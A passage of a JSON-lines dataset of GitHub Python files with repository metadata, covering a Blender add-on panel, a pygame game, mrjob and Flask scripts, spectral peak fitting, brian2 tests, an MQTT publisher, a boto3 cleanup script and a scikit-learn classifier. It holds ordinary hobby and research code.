op.filepath = obj_props.source_directory\n\n\nclass VIEW3D_PT_wowbject_combiner_panel(bpy.types.Panel):\n bl_space_type = 'NODE_EDITOR'\n bl_region_type = 'UI'\n bl_category = \"WoWbject\"\n bl_label = \"WoWbject Combiners\"\n\n def draw(self, context):\n layout = self.layout\n root = layout.column(align=True)\n\n op = root.operator_menu_enum(\n \"wowbj.get_combiner\",\n \"combiner\"\n )\n\n if context.active_node:\n root.prop(context.active_node, \"location\")","repo_name":"ThatAsherGuy/WoWbjectImporter","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"15638106837","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 19 13:01:10 2018\n\n@author: 某树\n\"\"\"\n \nimport pygame\nimport game_functions as gf\n\nfrom boss import Boss\nfrom scoreboard import Scoreboard\nfrom button import Button\nfrom game_stats import GameStats\nfrom pygame.sprite import Group\nfrom settings import Settings\nfrom assassin import Ship\n\n\n#获取玩家电脑屏幕尺寸!!!\n\nmsg = \"\"\"操作提示:按空格键攻击,‘←’和‘→’键控制人物方向,‘esc’键退出游戏\"\"\"\n\ndef run_game():\n #初始化游戏并创建一个屏幕对象\n pygame.init()\n #pygame.mixer.init()\n font1 = pygame.font.SysFont(\"kaiti\",24)\n imgText = font1.render(msg,True,(0,0,0))\n ai_settings = Settings()\n screen = pygame.display.set_mode(\n (ai_settings.screen_width,ai_settings.screen_height),pygame.RESIZABLE)\n #窗口标题\n pygame.display.set_caption(\"别撞南墙\")\n \n #创建存储游戏统计信息的实力,并创建记分牌\n stats = GameStats(ai_settings)\n sb = Scoreboard(ai_settings,screen,stats)\n #创舰一艘飞船、一个子弹编组、一个外星人编组\n bullets = Group()\n ship = Ship(ai_settings,screen)\n boss = Boss(ai_settings,screen)\n aliens = Group()\n #创建外星人群\n gf.create_fleet(ai_settings,screen,ship,aliens)\n \n #sound = pygame.mixer.Sound('C:/LOP/python_work/donot_touch_the_south_wall/music/bgm.ogg')\n #创建play按钮\n play_button = Button(ai_settings,screen,\"开始游戏\") \n #开始游戏的主循环\n while True:\n \n gf.check_events(ai_settings,screen,ship,bullets,\n stats,play_button,aliens,sb)\n #sound.play()\n if stats.game_active:\n \n ship.update()\n gf.update_bullets(bullets,aliens,ai_settings,screen,ship,stats,sb,boss)\n gf.update_aliens(aliens,ai_settings,ship,screen,bullets,stats,sb,boss)\n gf.update_boss(boss,screen,stats,aliens,ai_settings,ship,bullets,sb)\n gf.update_screen(ai_settings,screen,ship,bullets,aliens,\n stats,play_button,sb,boss,imgText)\n #sound.stop\n \nrun_game()\n 
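\n# Note: run_game() loops without a frame-rate cap. A minimal sketch of the usual\n# pygame idiom, assuming only the standard pygame.time.Clock API, would be:\n#\n#     clock = pygame.time.Clock()\n#     while True:\n#         clock.tick(60)  # cap the main loop at ~60 frames per second\n#         ...             # poll events and redraw, as run_game() does\n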
","repo_name":"ibaomu/pygame_Donot_Touch_The_South_Wall","sub_path":"donot_touch_the_south_wall.pyw","file_name":"donot_touch_the_south_wall.pyw","file_ext":"pyw","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33904250431","text":"from mrjob.job import MRJob\nfrom mrjob.step import MRStep\n''' \npython 02_score_distribution.py test.txt\npython 02_score_distribution.py prep_reviews.csv\n'''\n\nclass MRFood(MRJob):\n\n def mapper(self,_,line):\n (Id,ProductId,UserId,ProfileName,HelpfulnessNumerator,HelpfulnessDenominator,\n Score,Time,Summary,Text)= line.split('\\t')\n yield Score,1\n\n\n def reducer(self,key,values):\n\n yield key, sum(values)\n\nif __name__=='__main__':\n MRFood.run()","repo_name":"Filip-231/Big-data-hadoop-map-reduce","sub_path":"06_food_reviews/02_score_distribution.py","file_name":"02_score_distribution.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10884653502","text":"import os\n\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nfrom flask import jsonify, request\nfrom project import app\n\nfrom .effector import Effector\nfrom .utils import write_log\n\neffector = None\ndevice, curent_status = None, None\nload_dotenv()\nadaptation_status = False\n\n\n@app.route(\"/index\", methods=[\"GET\"])\ndef index():\n return jsonify({\"msg\": \"ok\"})\n\n\n@app.route(\"/configure\", methods=[\"POST\"])\ndef configure():\n global effector\n effector = Effector(request.json[\"strategies\"])\n return jsonify(\"Effector Configured\")\n\n\n@app.route(\"/adapt\", methods=[\"GET\"])\ndef adapt():\n global effector, device, current_status, adaptation_status, result\n\n scenario = request.args.get(\"scenario\")\n adapt_type = request.args.get(\"adapt_type\")\n\n write_log(f\"Adapting {adapt_type} for {scenario}.\")\n\n print(f\"ADAPT: {scenario} - {adapt_type}\")\n results = effector.adapt(scenario, adapt_type)\n count_fail = 0\n for result in results:\n if result[1] == \"fail\":\n count_fail += 1\n if count_fail > 0:\n return jsonify(\"Effector Failed\"), 400\n\n adaptation_status = True\n return jsonify(\"Effector Successful\"), 200\n\n\n@app.route(\"/return_to_previous\", methods=[\"GET\"])\ndef return_to_previous_state():\n global effector, device, current_status\n\n responses = []\n for result in results:\n if result[1] != \"fail\":\n write_log(f\"Returning {result[0]} to {result[1]}...\\n\")\n responses.append(effector.execute(result[0], result[1]))\n\n return jsonify(responses)\n","repo_name":"Adrilene/envaiot","sub_path":"Effector/project/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30576618335","text":"\"\"\" This module contain functions implementing the Pseudo-Voigt fit in lmfit.\nNone of these functions should be called directly by users - these functions are called from\nmethods in spectrum_fitting.\n\"\"\"\n\nfrom typing import List, Tuple, TYPE_CHECKING\n\nimport lmfit\nimport numpy as np\n\nif TYPE_CHECKING:\n from spectrum_fitting import PeakParams, MaximumParams\n\n\ndef do_pv_fit(peak_data: np.ndarray, peak_param: \"PeakParams\") -> lmfit.model.ModelResult:\n \"\"\"Pseudo-Voigt fit to the lattice plane peak intensity.\n\n :param peak_data: The data to be fitted, two theta values (x-data) in column 0 and intensity\n 
(y-data) in column 1.\n :param peak_param: A PeakParams object describing the peak to be fitted.\n \"\"\"\n model = None\n num_maxima = len(peak_param.maxima)\n\n # Add one peak to the model for each maximum\n for maxima_num in range(num_maxima):\n prefix = f\"maximum_{maxima_num}_\"\n if model:\n model += lmfit.models.PseudoVoigtModel(prefix=prefix)\n else:\n model = lmfit.models.PseudoVoigtModel(prefix=prefix)\n model += lmfit.Model(lambda x, background: background)\n\n two_theta = peak_data[:, 0]\n intensity = peak_data[:, 1]\n\n new_fit_parameters = guess_params(model, peak_param.previous_fit_parameters, two_theta,\n intensity, peak_param.maxima)\n # We can't use special characters in param names so have to save the user provided\n # name in user_data.\n for parameter in new_fit_parameters:\n if parameter != \"background\":\n parameter_num = int(parameter.split(\"_\")[1])\n new_fit_parameters[parameter].user_data = peak_param.maxima[parameter_num].name\n\n fit_result = model.fit(intensity, new_fit_parameters, x=two_theta)\n\n return fit_result\n\n\ndef guess_params(model: lmfit.Model, old_fit_params: lmfit.Parameters,\n x_data: np.ndarray, y_data: np.ndarray,\n maxima_params: List[\"MaximumParams\"]) -> lmfit.Parameters:\n \"\"\"Given a dataset and some information about where the maxima are, guess some good initial\n values for the Pseudo-Voigt fit.\n\n :param model: The lmfit Model to guess the params for.\n :param old_fit_params: Any params that are to be passed on from a previous fit\n :param x_data: The x data to be fitted.\n :param y_data: The y data to be fitted.\n :param maxima_params: The MaximaParams specified by the user.\n \"\"\"\n # This generates the derived parameters as well as the fundamental parameters\n new_fit_parameters = model.make_params()\n # We then overwrite some of the params to add a good initial guess.\n for index, maximum in enumerate(maxima_params):\n prefix = f\"maximum_{index}\"\n # If the params have been passed on then use them\n if old_fit_params and f\"{prefix}_center\" in old_fit_params:\n new_fit_parameters[f\"{prefix}_center\"] = old_fit_params[f\"{prefix}_center\"]\n new_fit_parameters[f\"{prefix}_sigma\"] = old_fit_params[f\"{prefix}_sigma\"]\n new_fit_parameters[f\"{prefix}_fraction\"] = old_fit_params[f\"{prefix}_fraction\"]\n new_fit_parameters[f\"{prefix}_amplitude\"] = old_fit_params[f\"{prefix}_amplitude\"]\n # If params haven't been passed on then guess new ones\n else:\n maximum_mask = np.logical_and(x_data > maximum.bounds[0], x_data < maximum.bounds[1])\n maxima_x = x_data[maximum_mask]\n maxima_y = y_data[maximum_mask]\n center = maxima_x[np.argmax(maxima_y)]\n\n max_sigma, min_sigma, sigma = guess_sigma(x_data, maximum.bounds)\n # When calculating amplitude take the maximum height of the peak but the minimum height\n # of the dataset overall. 
This is because the maximum_mask does not necessarily\n # include baseline points and we need the noise level.\n amplitude = (max(maxima_y) - min(y_data)) * 2 * sigma\n new_fit_parameters.add(f\"{prefix}_center\", value=center, min=maximum.bounds[0],\n max=maximum.bounds[1])\n new_fit_parameters.add(f\"{prefix}_sigma\", value=sigma, min=min_sigma, max=max_sigma)\n new_fit_parameters.add(f\"{prefix}_fraction\", value=0.2, min=0, max=1)\n new_fit_parameters.add(f\"{prefix}_amplitude\", value=amplitude, min=0)\n\n if old_fit_params and \"background\" in old_fit_params:\n new_fit_parameters[\"background\"] = old_fit_params[\"background\"]\n else:\n # Background should be > 0, but a little flexibility here improves fit convergence.\n new_fit_parameters.add(\"background\", value=min(y_data), min=-10, max=max(y_data))\n return new_fit_parameters\n\n\ndef guess_sigma(x_data: np.ndarray,\n maximum_range: Tuple[float, float]) -> Tuple[float, float, float]:\n \"\"\"Guess an initial value of sigma for the Pseudo-Voigt fit.\n\n :param x_data: The x_data to be fitted.\n :param maximum_range: Two floats indicating the range of values that the maximum falls within.\n :return: A maximum possible value for sigma, a minimum possible value and the initial guess\n of sigma.\n \"\"\"\n\n # By definition in the PV fit, sigma is half the width of the peak at FHWM.\n # In the case of a single peak, the maximum range is set to the peak bounds\n # In the case of multiplet peaks the maximum range is set approximately at the\n # FWHM either side of the peak.\n x_range = max(x_data) - min(x_data)\n maximum_range = maximum_range[1] - maximum_range[0]\n\n if maximum_range > 0.8 * x_range:\n # If the maximum range is similar to the x_range then we have a single peak. Make\n # assumptions based on data width\n # Sigma is approximately 7% of the peak_bounds\n sigma = 0.07 * x_range\n # The minimum sigma is approximately 2.5% of the peak bounds\n min_sigma = 0.025 * x_range\n # The maximum sigma is approximately 20% of the peak bounds\n max_sigma = 0.20 * x_range\n\n else:\n # We are dealing with multiple peaks - set sigma to be close to the maxima range\n sigma = 0.5 * maximum_range\n min_sigma = 0.1 * maximum_range\n max_sigma = 4 * maximum_range\n\n return max_sigma, min_sigma, sigma\n","repo_name":"LightForm-group/xrdfit","sub_path":"xrdfit/pv_fit.py","file_name":"pv_fit.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"36824431164","text":"import builtins\n\nimport pytest\n\nfrom brian2.utils.environment import running_from_ipython\nfrom brian2.utils.stringtools import SpellChecker\n\n\n@pytest.mark.codegen_independent\ndef test_environment():\n \"\"\"\n Test information about the environment we are running under.\n \"\"\"\n if hasattr(builtins, \"__IPYTHON__\"):\n testing_under_ipython = True\n del builtins.__IPYTHON__\n else:\n testing_under_ipython = False\n\n assert not running_from_ipython()\n builtins.__IPYTHON__ = True\n assert running_from_ipython()\n\n if not testing_under_ipython:\n del builtins.__IPYTHON__\n\n\n@pytest.mark.codegen_independent\ndef test_spell_check():\n checker = SpellChecker([\"vm\", \"alpha\", \"beta\"])\n assert checker.suggest(\"Vm\") == {\"vm\"}\n assert checker.suggest(\"alphas\") == {\"alpha\"}\n assert checker.suggest(\"bta\") == {\"beta\"}\n assert checker.suggest(\"gamma\") == set()\n\n\nif __name__ == \"__main__\":\n test_environment()\n 
test_spell_check()\n","repo_name":"brian-team/brian2","sub_path":"brian2/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":823,"dataset":"github-code","pt":"61"} +{"seq_id":"23616315961","text":"import sys\r\n\r\nf = open(sys.argv[1], 'r')\r\nlines = f.readlines()\r\nlines.pop(0)\r\nf.close()\r\n\r\nf = open('asdf.txt', 'w')\r\nc = 0\r\n\r\ndef format(list):\r\n\treturn str(list).replace(\"'\", '')\r\n\r\nfor l in lines:\r\n\tc+=1\r\n\tl = l.split()\r\n\topposed = 0\r\n\tform = 0\r\n\tif l[0] == '0':\r\n\t\tnext = 1\r\n\telif l[0] == '1':\r\n\t\tform = list(l[1][:2])\r\n\t\tnew = l[1][2]\r\n\t\tnext = 2\r\n\tif l[next] == '0':\r\n\t\tnext += 2\r\n\telif l[next] == '1':\r\n\t\topposed = list(l[next+1][:2])\r\n\t\tnext += 3\r\n\t\r\n\tevoke = []\r\n\tfor e in l[next]:\r\n\t\tevoke.append(e)\r\n\t\tif form and len(evoke) >= 2 and (evoke[-2:] == [form[0], form[1]] or evoke[-2:] == [form[1], form[0]]):\r\n\t\t\tevoke.pop()\r\n\t\t\tevoke.pop()\r\n\t\t\tevoke.append(new)\r\n\t\telif opposed and opposed[0] in evoke and opposed[1] in evoke:\r\n\t\t\tevoke = []\r\n\t\r\n\tf.write('Case #' + str(c) + \": \" + format(evoke) + \"\\n\")\r\n\t\r\nf.close()\r\n\t\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/1085.py","file_name":"1085.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12731306154","text":"#!/usr/bin/env python3\n\nimport os\nimport pathlib\nimport sys\nimport warnings\nimport logging as log\n\n# import pyarrow as pa\n# import numpy as np\n# import astropy.units as u\n\nfrom astropy.wcs.wcs import FITSFixedWarning\nfrom argparse import ArgumentParser\nfrom swift_comet_pipeline.pipeline_files import PipelineFiles\nfrom swift_comet_pipeline.stacking import StackingMethod\n\nfrom swift_comet_pipeline.swift_data import SwiftData\nfrom swift_comet_pipeline.configs import read_swift_project_config\nfrom swift_comet_pipeline.observation_log import (\n    build_observation_log,\n    # observation_log_schema,\n    write_observation_log,\n)\nfrom swift_comet_pipeline.swift_filter import SwiftFilter\n\n\ndef process_args():\n    # Parse command-line arguments\n    parser = ArgumentParser(\n        usage=\"%(prog)s [options]\",\n        description=__doc__,\n        prog=os.path.basename(sys.argv[0]),\n    )\n    # parser.add_argument(\"--version\", action=\"version\", version=__version__)\n    parser.add_argument(\n        \"--verbose\", \"-v\", action=\"count\", default=0, help=\"increase verbosity level\"\n    )\n    parser.add_argument(\n        \"swift_project_config\", nargs=1, help=\"Filename of project config\"\n    )\n    parser.add_argument(\n        \"--output\",\n        \"-o\",\n        default=\"observation_log.parquet\",\n        help=\"Filename of observation log output\",\n    )\n\n    args = parser.parse_args()\n\n    # handle verbosity\n    if args.verbose >= 2:\n        log.basicConfig(format=\"%(levelname)s: %(message)s\", level=log.DEBUG)\n    elif args.verbose == 1:\n        log.basicConfig(format=\"%(levelname)s: %(message)s\", level=log.INFO)\n    else:\n        log.basicConfig(format=\"%(levelname)s: %(message)s\")\n\n    return args\n\n\n# Render a boolean as a check mark or a cross in the status listing below.\ndef bool_to_x_or_check(x: bool):\n    if x:\n        return \"✔\"\n    else:\n        return \"✗\"\n\n\ndef main():\n    # we don't care about these particular warnings\n    warnings.resetwarnings()\n    warnings.filterwarnings(\"ignore\", category=FITSFixedWarning, append=True)\n\n    args = process_args()\n\n    swift_project_config_path = 
pathlib.Path(args.swift_project_config[0])\n swift_project_config = read_swift_project_config(swift_project_config_path)\n if swift_project_config is None:\n print(f\"Error reading config file {swift_project_config_path}, exiting.\")\n return 1\n\n pipeline_files = PipelineFiles(swift_project_config.product_save_path)\n\n print(\n pipeline_files.observation_log.product_path,\n bool_to_x_or_check(pipeline_files.observation_log.product_path.exists()),\n )\n print(\n pipeline_files.comet_orbital_data.product_path,\n bool_to_x_or_check(pipeline_files.comet_orbital_data.product_path.exists()),\n )\n print(\n pipeline_files.earth_orbital_data.product_path,\n bool_to_x_or_check(pipeline_files.earth_orbital_data.product_path.exists()),\n )\n\n if pipeline_files.epoch_products is None:\n print(\"No epochs defined yet!\")\n exit(0)\n\n # print(pipeline_files.epoch_file_paths)\n print(\"Epochs:\")\n for x in pipeline_files.epoch_products:\n print(x.product_path.stem)\n\n print(\"\")\n print(\"Stacked epochs and images:\")\n for x in pipeline_files.epoch_file_paths: # type: ignore\n ep_prod = pipeline_files.stacked_epoch_products[x] # type: ignore\n print(ep_prod.product_path, bool_to_x_or_check(x.exists()))\n uw1_sum = pipeline_files.stacked_image_products[ # type: ignore\n x, SwiftFilter.uw1, StackingMethod.summation\n ]\n print(\n f\"uw1 sum: {uw1_sum.product_path.stem}, {bool_to_x_or_check(uw1_sum.exists())}\"\n )\n if uw1_sum.exists():\n uw1_sum.load_product()\n print(\"Dimensions:\", uw1_sum.data_product.data.shape)\n\n bg_prod = pipeline_files.analysis_background_products[x] # type: ignore\n print(bg_prod.product_path, bool_to_x_or_check(bg_prod.exists()))\n if bg_prod.exists():\n bg_prod.load_product()\n print(bg_prod.data_product[\"method\"])\n\n uw1_bg_sub = pipeline_files.analysis_bg_subtracted_images[x, SwiftFilter.uw1, StackingMethod.summation] # type: ignore\n print(uw1_bg_sub.product_path, bool_to_x_or_check(uw1_bg_sub.exists()))\n if uw1_bg_sub.exists():\n uw1_bg_sub.load_product()\n print(\"Dimensions:\", uw1_bg_sub.data_product.data.shape)\n uvv_bg_sub = pipeline_files.analysis_bg_subtracted_images[x, SwiftFilter.uvv, StackingMethod.summation] # type: ignore\n print(uvv_bg_sub.product_path, bool_to_x_or_check(uvv_bg_sub.exists()))\n if uvv_bg_sub.exists():\n uvv_bg_sub.load_product()\n print(\"Dimensions:\", uvv_bg_sub.data_product.data.shape)\n\n q = pipeline_files.analysis_qh2o_products[x] # type: ignore\n print(q.product_path, bool_to_x_or_check(q.exists()))\n if q.exists():\n q.load_product()\n print(q.data_product.Q_H2O[0])\n\n print(\"\")\n\n # print(pipeline_files.stacked_image_product_dict)\n\n # horizons_id = swift_project_config.jpl_horizons_id\n # sdd = SwiftData(data_path=pathlib.Path(swift_project_config.swift_data_path))\n\n # df = build_observation_log(\n # swift_data=sdd,\n # obsids=sdd.get_all_observation_ids(),\n # horizons_id=horizons_id,\n # )\n\n # if df is None:\n # print(\n # \"Could not construct the observation log in memory, exiting without writing output.\"\n # )\n # return 1\n #\n # write_observation_log(df, pipeline_files.get_observation_log_path())\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"sjoset/swift_comet_pipeline","sub_path":"deprecated/50_pipeline_product_status.py","file_name":"50_pipeline_product_status.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5347412243","text":"import paho.mqtt.client as mqtt\nimport 
paho.mqtt.publish as publish\nimport time, random\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"$SYS/#\")\n\n# Publishes every 5 second a random generated temperature between [-20; 40] to the MQTT Broker\ndef on_message(client, userdata, msg):\n #print(msg.topic+\" \"+str(msg.payload))\n temp = random.randint(-20, 40)\n publish.single(\"temperature\", temp, hostname=\"localhost\")\n time.sleep(5)\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"localhost\", 1883, 60)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nclient.loop_forever()","repo_name":"BlackIceDection/BlackIceDetection","sub_path":"scripts/mqtt_example.py","file_name":"mqtt_example.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29987225753","text":"import boto3\nfrom botocore.exceptions import ClientError\n\nec2 = boto3.client('ec2')\ndef del_security(security):\n try:\n response = ec2.delete_security_group(GroupId=security)\n print('Security Group Deleted')\n except ClientError as e:\n print(e)\n\ndef del_key(key):\n response = ec2.delete_key_pair(KeyName=key)\n print(response)\n\ndef del_all(key,security):\n del_security(security)\n del_key(key)","repo_name":"SaumoB/aws","sub_path":"aws_on_error.py","file_name":"aws_on_error.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23617771251","text":"import sys\r\n\r\ndef match_opposites(result, c, c_opposites):\r\n for b in result:\r\n if b in c_opposites: return True\r\n\r\ndef do_magicka(s, reactions, opposites):\r\n result = []\r\n for c in s:\r\n if not result:\r\n result.append(c)\r\n continue\r\n \r\n react = result[-1] + c\r\n if react in reactions:\r\n result[-1] = reactions[react]\r\n elif match_opposites(result, c, opposites.get(c, {})):\r\n result = []\r\n else:\r\n result.append(c)\r\n \r\n return result\r\n\r\ndef main(input, output):\r\n cases_count = int(input.readline())\r\n for i in xrange(cases_count):\r\n case_id = i+1\r\n \r\n case = input.readline()\r\n case = iter(case.split())\r\n \r\n reactions = {}\r\n for j in xrange(int(case.next())):\r\n reaction = case.next()\r\n if len(reaction) != 3: raise ValueError()\r\n reactions[reaction[:2]] = reaction[2]\r\n reactions[reaction[:2][::-1]] = reaction[2]\r\n \r\n opposites = {}\r\n for j in xrange(int(case.next())):\r\n opps = case.next()\r\n if len(opps) != 2: raise ValueError()\r\n a, b = opps\r\n opposites.setdefault(a, {})[b] = True\r\n opposites.setdefault(b, {})[a] = True\r\n \r\n str_len = int(case.next())\r\n s = case.next()\r\n assert len(s) == str_len\r\n \r\n result = do_magicka(s, reactions, opposites)\r\n result = '[%s]' % ', '.join(result) \r\n \r\n print >> output, 'Case #%s: %s' % (case_id, result)\r\n\r\nif __name__ == '__main__':\r\n if '-q' in sys.argv:\r\n log = lambda msg: None\r\n sys.argv.remove('-q')\r\n if len(sys.argv) > 1:\r\n input_path = sys.argv[1]\r\n else:\r\n input_path = 'example.txt'\r\n 
with file(input_path) as input:\r\n main(input, sys.stdout)\r\n ","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/428.py","file_name":"428.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26818510797","text":"#!/bin/python\n\nfrom six import StringIO\nfrom scipy.io import arff\nfrom sklearn.tree import DecisionTreeClassifier, export_text, export_graphviz\nfrom IPython.display import Image\nfrom sklearn.metrics import accuracy_score, roc_curve, roc_auc_score, plot_confusion_matrix\nfrom sklearn.naive_bayes import CategoricalNB\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.model_selection import train_test_split\n\nimport pydotplus\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# nya frankie\ndef frankie(target, names):\n return np.array(list(map(lambda x: np.where(names == x)[0][0], target)))\n\ndef extract_column(df, index):\n return df[df.columns[index]]\n\ndef build_labelencoders(df):\n arr = []\n for i in range(0, len(df.columns)):\n le = LabelEncoder()\n col = extract_column(df, i).unique()\n le.fit(col)\n arr.append(le)\n return arr\n\ndef build_onehotencoders(df):\n ohe1 = OneHotEncoder()\n ohe1.fit(df.iloc[:, :-1])\n ohe2 = OneHotEncoder()\n ohe2.fit(df.iloc[:, -1:])\n #print(ohe.transform(df)[:5, :])\n return ohe1, ohe2\n\ndef create_tree_using_labelencoders(df):\n les = build_labelencoders(df)\n res = []\n for i in range(0, len(df.columns)):\n col = df.iloc[:, i].values\n res.append(les[i].transform(col))\n res = pd.DataFrame(res)\n\n #print(res.transpose())\n #inverse_res = []\n #for i in range(0, len(df.columns)):\n #col = res.iloc[i, :].values\n #inverse_res.append(les[i].inverse_transform(col))\n #inverse_res = pd.DataFrame(inverse_res)\n #print(inverse_res.transpose())\n res = res.transpose()\n data = res.iloc[:,:-1]\n target = res.iloc[:,-1:]\n feature_names = list(df.columns[:-1])\n class_names = list(extract_column(df, -1).unique())\n return data, target, feature_names, class_names\n\ndef create_tree_using_onehotencoders(df):\n oheData, oheTarget = build_onehotencoders(df)\n res = pd.DataFrame(oheData.transform(df.iloc[:, :-1]).toarray())\n data = res.iloc[:, :-1]\n res = pd.DataFrame(oheTarget.transform(df.iloc[:, -1:]).toarray())\n target = res.iloc[:,-1:]\n feature_names = oheData.get_feature_names(list(df.columns[:-1]))[:-1]\n class_names = list(extract_column(df, -1).unique())\n return data, target, feature_names, class_names\n\ndef perform_bayes(df):\n les = build_labelencoders(df)\n res = []\n for i in range(len(df.columns)):\n col = df.iloc[:, i].values\n res.append(les[i].transform(col))\n res = pd.DataFrame(res).transpose()\n x = res.iloc[:, :-1]\n y = res.iloc[:, -1:]\n\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=10)\n\n model = CategoricalNB()\n model.fit(x_train, y_train.values.ravel())\n\n y_pred = model.predict(x_test)\n y_pred_probability = model.predict_proba(x_test)[::, 1]\n\n accuracy = accuracy_score(y_test, y_pred) * 100\n print(accuracy)\n\n # example patient\n test = ['50-59','ge40','50-54','24-26','no','1','right','left_up','yes']\n print(test)\n\n # transform using labelencoders\n for i in range(len(test)):\n e = test[i]\n test[i] = les[i].transform(np.array(e).reshape(1, ))\n test = np.array(test)\n\n # do prediction\n y = model.predict(test.reshape(1, -1))\n\n # translate back\n y = 
les[-1].inverse_transform(y)[0]\n print(y)\n\n a, b, _ = roc_curve(y_test, y_pred_probability)\n area_under_curve = roc_auc_score(y_test, y_pred_probability)\n plt.plot(a, b, label=\"area under curve=\"+str(area_under_curve))\n plt.xlabel(\"false positive rate\")\n plt.ylabel(\"true positive rate\")\n plt.axis\n plt.legend(loc=4)\n plot_confusion_matrix(model, x_train, y_train.values.ravel(), normalize='true', display_labels=les[-1].inverse_transform([0, 1]))\n plt.show()\n\nfiledata = arff.loadarff('./breast-cancer.arff')\n\ndf = pd.DataFrame(filedata[0])\nfor i in range(0, len(df.columns)):\n title = list(df.columns)[i]\n df[title] = df[title].apply(lambda s: s.decode(\"utf-8\"))\n\n#data, target, feature_names, class_names = create_tree_using_labelencoders(df)\ndata, target, feature_names, class_names = create_tree_using_onehotencoders(df)\n\nx_train, x_test, y_train, y_test = train_test_split(data, target, train_size=0.25, random_state=10)\n\ndecision_tree = DecisionTreeClassifier(random_state=0, criterion=\"entropy\")\npath = decision_tree.cost_complexity_pruning_path(x_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\n\nfig, ax = plt.subplots()\nax.plot(ccp_alphas[:-1], impurities[:-1], marker='o', drawstyle=\"steps-post\")\nax.set_xlabel(\"effective alpha\")\nax.set_ylabel(\"total impurity of leaves\")\nax.set_title(\"Total Impurity vs effective alpha for training set\")\n\nclfs = []\nfor ccp_alpha in ccp_alphas:\n clf = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)\n clf.fit(x_train, y_train)\n clfs.append(clf)\nprint(\"Number of nodes in the last tree is: {} with ccp_alpha: {}\".format(clfs[-1].tree_.node_count, ccp_alphas[-1]))\nclfs = clfs[:-1]\nccp_alphas = ccp_alphas[:-1]\n\nnode_counts = [clf.tree_.node_count for clf in clfs]\ndepth = [clf.tree_.max_depth for clf in clfs]\nfig, ax = plt.subplots(2, 1)\nax[0].plot(ccp_alphas, node_counts, marker='o', drawstyle=\"steps-post\")\nax[0].set_xlabel(\"alpha\")\nax[0].set_ylabel(\"number of nodes\")\nax[0].set_title(\"Number of nodes vs alpha\")\nax[1].plot(ccp_alphas, depth, marker='o', drawstyle=\"steps-post\")\nax[1].set_xlabel(\"alpha\")\nax[1].set_ylabel(\"depth of tree\")\nax[1].set_title(\"Depth vs alpha\")\nfig.tight_layout()\n\ntrain_scores = [clf.score(x_train, y_train) for clf in clfs]\ntest_scores = [clf.score(x_test, y_test) for clf in clfs]\n\nfig, ax = plt.subplots()\nax.set_xlabel(\"alpha\")\nax.set_ylabel(\"accuracy\")\nax.set_title(\"Accuracy vs alpha for training and testing sets\")\nax.plot(ccp_alphas, train_scores, marker='o', label=\"train\",\n drawstyle=\"steps-post\")\nax.plot(ccp_alphas, test_scores, marker='o', label=\"test\",\n drawstyle=\"steps-post\")\nax.legend()\n\nplt.show()\n\ndecision_tree = decision_tree.fit(x_train, y_train)\n\nplot_confusion_matrix(decision_tree, x_test, y_test.values.ravel(), display_labels=class_names)\nplt.show()\n\n#r = export_text(decision_tree, feature_names)\n#print(r)\n\ndot_data = StringIO()\n\nexport_graphviz(decision_tree, \n out_file=dot_data,\n filled=True,\n rounded=True,\n special_characters=True,\n feature_names=feature_names,\n class_names=class_names)\n\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\ngraph.write_png(\"big_tree.png\")\nImage(graph.create_png())\n\n\n# extracted from graph\n\"\"\"\ndecision_tree.ccp_alpha = 0.04\ndecision_tree = decision_tree.fit(x_train, y_train)\n\ndot_data = StringIO()\n\nexport_graphviz(decision_tree, \n out_file=dot_data,\n filled=True,\n rounded=True,\n 
